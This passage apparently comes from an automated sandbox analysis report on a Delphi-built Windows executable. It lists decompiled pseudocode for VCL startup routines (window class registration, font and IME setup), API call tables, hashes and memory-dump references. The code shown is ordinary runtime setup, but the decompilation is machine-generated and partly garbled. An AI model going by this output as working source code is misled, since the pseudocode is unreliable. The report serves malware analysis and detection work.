				 *0x48fbb4 = E00414340(1);
				E00443C20();
				 *0x48fb64 = E00443A48(1, 1);
				_t47 = E004565F4(1, __edi);
				_t78 =  *0x48e838; // 0x48fc00
				 *_t78 = _t47;
				_t49 = E004576D8(0, 1);
				_t80 =  *0x48e6ec; // 0x48fbfc
				 *_t80 = _t49;
				_t50 =  *0x48e6ec; // 0x48fbfc
				E004591E4( *_t50, 1);
				_t53 =  *0x4338d4; // 0x4338d8
				E0041388C(_t53, 0x435dd0, 0x435de0);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4718cc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x44419b);
				E00404320( &_v20);
				return E00404320( &_v8);
			}

0x00444025
0x00444028
0x0044402d
0x0044402e
0x00444033
0x00444036
0x00444042
0x00444045
0x00444053
0x00444060
0x00444065
0x00444075
0x0044407f
0x00444084
0x00444087
0x00444090
0x00444093
0x004440a4
0x004440b1
0x004440b6
0x004440c6
0x004440cc
0x004440dc
0x004440ed
0x004440f2
0x00444103
0x00444111
0x00444116
0x0044411c
0x00444127
0x0044412c
0x00444132
0x00444134
0x0044413d
0x0044414c
0x00444151
0x00444160
0x00444164
0x00444171
0x00444171
0x00444178
0x0044417b
0x0044417e
0x00444186
0x00444193

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00444194), ref: 0044403D
GlobalAddAtomA.KERNEL32 ref: 00444070
GetCurrentThreadId.KERNEL32 ref: 0044408B
GlobalAddAtomA.KERNEL32 ref: 004440C1
RegisterClipboardFormatA.USER32 ref: 004440D7

Part of subcall function 00414340: RtlInitializeCriticalSection.KERNEL32(00411A30,?,?,004440ED,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0041435F

Part of subcall function 00443C20: SetErrorMode.KERNEL32(00008000), ref: 00443C39
Part of subcall function 00443C20: GetModuleHandleA.KERNEL32(USER32,00000000,00443D86,?,00008000), ref: 00443C5D
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00443C6A
Part of subcall function 00443C20: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00443D86,?,00008000), ref: 00443C86
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00443CA8
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00443CBD
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00443CD2
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00443CE7
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00443CFC
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00443D11
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00443D26
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00443D3B
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00443D50
Part of subcall function 00443C20: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00443D65
Part of subcall function 00443C20: SetErrorMode.KERNEL32(?,00443D8D,00008000), ref: 00443D80

Part of subcall function 004565F4: GetKeyboardLayout.USER32(00000000), ref: 00456639
Part of subcall function 004565F4: 72E7AC50.USER32(00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0045668E
Part of subcall function 004565F4: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00456698
Part of subcall function 004565F4: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000), ref: 004566A3

Part of subcall function 004576D8: LoadIconA.USER32(00400000,MAINICON), ref: 004577BD
Part of subcall function 004576D8: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 004577EF
Part of subcall function 004576D8: OemToCharA.USER32(?,?), ref: 00457802
Part of subcall function 004576D8: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00457842

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0044415B
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 0044416C

Strings

ControlOfs%.8X%.8X, xrefs: 0044409F
AnimateWindow, xrefs: 00444166
USER32, xrefs: 00444156
Delphi%.8X, xrefs: 0044404E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 2159221912-1126952177
Opcode ID: e33024c06f5afdee77b25c73845cc6a19d7e5998cc67c6f4b629d1891f190287
Instruction ID: af478dcbbb5da71574c89e97fa3cf061665a4bb14f526afbd268ac0a14bc0d7f
Opcode Fuzzy Hash: e33024c06f5afdee77b25c73845cc6a19d7e5998cc67c6f4b629d1891f190287
Instruction Fuzzy Hash: 144141B0A006459BD700FFB9E892A8E77F4AB55308B51953FF500E77A2DB38A9048B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004579E0, Relevance: 13.6, APIs: 9, Instructions: 130
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004579E0(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x457b77);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x457b7e);
					return E00404320( &_v48);
				}
				_t22 =  *0x48e74c; // 0x48f048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041CDB0(E00457EFC, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x471c2c; // 0x4576c8
				_t26 =  *0x48f714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x48f714; // 0x400000
					 *0x471c18 = _t61;
					_t87 = RegisterClassA(0x471c08);
					if(_t87 == 0) {
						_t63 =  *0x48e500; // 0x41d0c4
						E00406520(_t63,  &_v48);
						E0040A0E8(_v48, 1);
						E00403D80();
					}
				}
				_t28 =  *0x48e5b4; // 0x48fa94
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x48e5b4; // 0x48fa94
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x48f714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x28ac0044
				_t38 = E004047D0( *_t7);
				_t39 =  *0x471c2c; // 0x4576c8, executed
				_t40 = E0040728C(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44fbf8
				E00404320(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10940000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x48e620; // 0x48fb68
				if( *_t46 != 0) {
					_t54 = E004585D4(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E004585D4(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x48e620; // 0x48fb68
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}

0x004579e9
0x004579ec
0x004579f0
0x004579f1
0x004579f6
0x004579f9
0x00457a03
0x00457b61
0x00457b63
0x00457b66
0x00457b69
0x00457b76
0x00457b76
0x00457a09
0x00457a11
0x00000000
0x00000000
0x00457a1d
0x00457a22
0x00457a29
0x00457a2f
0x00457a3c
0x00457a3e
0x00457a43
0x00457a52
0x00457a55
0x00457a5a
0x00457a5f
0x00457a6e
0x00457a73
0x00457a73
0x00457a55
0x00457a7a
0x00457a83
0x00457a85
0x00457a87
0x00457a87
0x00457a8d
0x00457a96
0x00457a98
0x00457a9a
0x00457a9a
0x00457a9d
0x00457a9e
0x00457aa0
0x00457aa2
0x00457aa4
0x00457aa6
0x00457aab
0x00457aac
0x00457aae
0x00457ab4
0x00457ac0
0x00457ac5
0x00457aca
0x00457acd
0x00457ad3
0x00457ad8
0x00457adf
0x00457ae5
0x00457ae9
0x00457aee
0x00457af6
0x00457afa
0x00457b07
0x00457b0b
0x00457b12
0x00457b1a
0x00457b1e
0x00457b1e
0x00457b25
0x00457b2e
0x00457b38
0x00457b45
0x00457b4a
0x00457b52
0x00457b5c
0x00457b5c
0x00000000

APIs

Part of subcall function 0041CDB0: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041CDCE

GetClassInfoA.USER32 ref: 00457A35
RegisterClassA.USER32 ref: 00457A4D

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

SetWindowLongA.USER32 ref: 00457AE9
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00457B0B
SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B1E
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B29
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B38
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B45
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044FB6C), ref: 00457B5C

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: 61c1e4053d05c4287ab9c8302e568e471a7a44a351a4d4e23503fd9e28d74e65
Instruction ID: ad02c31446ef89ead986fbf7a95cf857443d092e367496dd216a9756b297a0fc
Opcode Fuzzy Hash: 61c1e4053d05c4287ab9c8302e568e471a7a44a351a4d4e23503fd9e28d74e65
Instruction Fuzzy Hash: 104122716442006FE711EF69EC82F5A37A8AB45708F54457AFE00EF2E3DA78AC44876C

Uniqueness

Uniqueness Score: -1.00%

Function 00456DD0, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00456DD0(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x48fbfc != 0) {
					_t54 =  *0x48fbfc; // 0x21d1310
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x456f15);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x48fbfc != 0) {
					_t52 =  *0x48fbfc; // 0x21d1310
					E004591E4(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F188( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F188( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041F26C( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F188( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041F188( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F188( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041EFCC( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041EFCC( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x456f1c);
				if( *0x48fbfc != 0) {
					_t38 =  *0x48fbfc; // 0x21d1310
					return E004591E4(_t38, _v5);
				}
				return 0;
			}

0x00456dd0
0x00456dd1
0x00456dd3
0x00456dda
0x00456ddc
0x00456de7
0x00456de9
0x00456df4
0x00456df4
0x00456df9
0x00456dfa
0x00456dff
0x00456e02
0x00456e0c
0x00456e10
0x00456e15
0x00456e15
0x00456e2b
0x00456e47
0x00456e4e
0x00456e54
0x00456e2d
0x00456e31
0x00456e38
0x00456e3e
0x00456e3e
0x00456e59
0x00456e70
0x00456e77
0x00456ead
0x00456eb8
0x00456ebf
0x00456ec6
0x00456ecc
0x00456e79
0x00456e80
0x00456e87
0x00456e8d
0x00456e99
0x00456ea0
0x00456ea6
0x00456ea6
0x00456ed1
0x00456edc
0x00456ee1
0x00456eec
0x00456ef6
0x00456ef9
0x00456f05
0x00456f0a
0x00000000
0x00456f0f
0x00456f14

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00456E24
CreateFontIndirectA.GDI32(?), ref: 00456E31
GetStockObject.GDI32(0000000D), ref: 00456E47

Part of subcall function 0041F26C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F279

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00456E70
CreateFontIndirectA.GDI32(?), ref: 00456E80
CreateFontIndirectA.GDI32(?), ref: 00456E99
GetStockObject.GDI32(0000000D), ref: 00456EBF

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 47e6a2a5273aab672d0d263ed654e8c02f208c43855a048955b84f40bc6cb5b9
Instruction ID: 22455cef2fa3044bae6d6303f9818bc19750aebba8a6dec4bd026751b0e5dc34
Opcode Fuzzy Hash: 47e6a2a5273aab672d0d263ed654e8c02f208c43855a048955b84f40bc6cb5b9
Instruction Fuzzy Hash: 8B31C870744205ABD750EB69DC42BD937A4AB44304F91807ABD08EB2D7DE789D4ECB29

Uniqueness

Uniqueness Score: -1.00%

Function 004576D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004576D8(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403918(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041BD2C(_t91, 0);
				_t42 =  *0x48e664; // 0x471468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x48e664; // 0x471468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x458d0c;
				}
				_t43 =  *0x48e704; // 0x471470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x48e704; // 0x471470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00458F04;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425B40(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x48e598; // 0x48f02c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E00425F10(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x459474;
				_t60 =  *0x48e598; // 0x48f02c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040AC88(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408BB4( &_v261, _t27);
				}
				_t69 = E0040ACB0( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44fbf8
				E00404588(_t31, 0x100,  &_v261);
				_t75 =  *0x48e480; // 0x48f034
				if( *_t75 == 0) {
					E004579E0(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00459650(_t90, 0x100);
				E00459F90(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403970(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

0x004576d8
0x004576d8
0x004576e5
0x004576e7
0x004576ea
0x004576ea
0x004576ef
0x004576f2
0x004576f8
0x004576fd
0x00457707
0x00457709
0x0045770e
0x00457711
0x00457711
0x00457717
0x0045771c
0x00457721
0x00457723
0x00457728
0x0045772b
0x0045772b
0x00457731
0x00457741
0x00457753
0x0045775b
0x00457760
0x00457766
0x0045776d
0x00457774
0x0045777a
0x00457780
0x00457787
0x0045778e
0x00457795
0x004577a8
0x004577aa
0x004577b5
0x004577bd
0x004577c6
0x004577cb
0x004577cb
0x004577d1
0x004577d4
0x004577e7
0x004577ef
0x00457802
0x0045780f
0x00457814
0x00457816
0x00457818
0x00457821
0x00457821
0x0045782e
0x00457835
0x00457837
0x00457837
0x00457842
0x00457847
0x00457858
0x0045785d
0x00457865
0x00457869
0x00457869
0x0045786e
0x00457872
0x00457876
0x0045787a
0x00457883
0x0045788b
0x00457892
0x00457897
0x0045789d
0x0045789f
0x004578a4
0x004578ab
0x004578b5

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 004577BD
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 004577EF
OemToCharA.USER32(?,?), ref: 00457802
CharLowerA.USER32(?,00400000,?,00000100,?,?,?,0044412C,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00457842

Strings

MAINICON, xrefs: 004577B0

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: MAINICON
API String ID: 3935243913-2283262055
Opcode ID: 3afd552d7edde93b84cccd1aa0bd78bbeee23eced089067980efc106cb9a2896
Instruction ID: f91650c1e48c6a7b71da3cdc9bf6eb6dac7f936d21e52dda7fdd992b64cca578
Opcode Fuzzy Hash: 3afd552d7edde93b84cccd1aa0bd78bbeee23eced089067980efc106cb9a2896
Instruction Fuzzy Hash: B25140706042449FDB40EF29D885B897BE4AB15308F4444FAEC48DF397D7B99988CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004565F4, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004565F4(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403918(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E0041BD2C(_t63, 0);
				_t28 =  *0x48e538; // 0x471458
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x456998;
				_t29 =  *0x48e544; // 0x471460
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x4569a4;
				E004569B0(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403584(1);
				_t42 = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00406E30();
				_t75 = _t42;
				L00406B00();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407090();
				_t11 = _t62 + 0x58; // 0x44fa946e
				_t45 =  *0x48e674; // 0x48fab0
				 *((intOrPtr*)( *_t45))(0, 0, E00452E78,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041EDF8(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041EDF8(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041EDF8(1);
				E00456DD0(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x456cac;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x456cac;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x456cac;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403970(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}

0x004565f4
0x004565f4
0x004565fc
0x004565fe
0x00456601
0x00456601
0x00456606
0x00456609
0x0045660f
0x00456614
0x00456619
0x0045661c
0x00456622
0x00456627
0x0045662a
0x00456632
0x0045663e
0x0045664d
0x0045665c
0x0045666b
0x0045667a
0x00456684
0x00456689
0x0045668e
0x00456693
0x00456698
0x0045669d
0x004566a3
0x004566a8
0x004566b6
0x004566bd
0x004566cb
0x004566dd
0x004566ef
0x004566f7
0x004566fc
0x004566fc
0x00456702
0x00456705
0x0045670c
0x0045670c
0x00456712
0x00456715
0x0045671c
0x0045671c
0x00456722
0x00456725
0x0045672c
0x00456732
0x00456734
0x00456739
0x00456740
0x00456749

APIs

GetKeyboardLayout.USER32(00000000), ref: 00456639
72E7AC50.USER32(00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0045668E
72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000,00444194), ref: 00456698
72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00444116,00000000,00000000,?,00000000,?,00000000), ref: 004566A3

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B380KeyboardLayout
String ID:
API String ID: 648844651-0
Opcode ID: 09d097c13d2e8ad1a3610dbe109d193eb6ad8e50cf5b8cf7c071f3cb8be01b42
Instruction ID: 9a5b49912678ea6d712e030840aa341b4aed046541f6b317ff7e9cc4908e3459
Opcode Fuzzy Hash: 09d097c13d2e8ad1a3610dbe109d193eb6ad8e50cf5b8cf7c071f3cb8be01b42
Instruction Fuzzy Hash: 493118B06002419FD740EF2AD885B897BE5AF14319F45807AED08DF3A2D6799848CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401A78, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401A78() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B2E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x48f5c4);
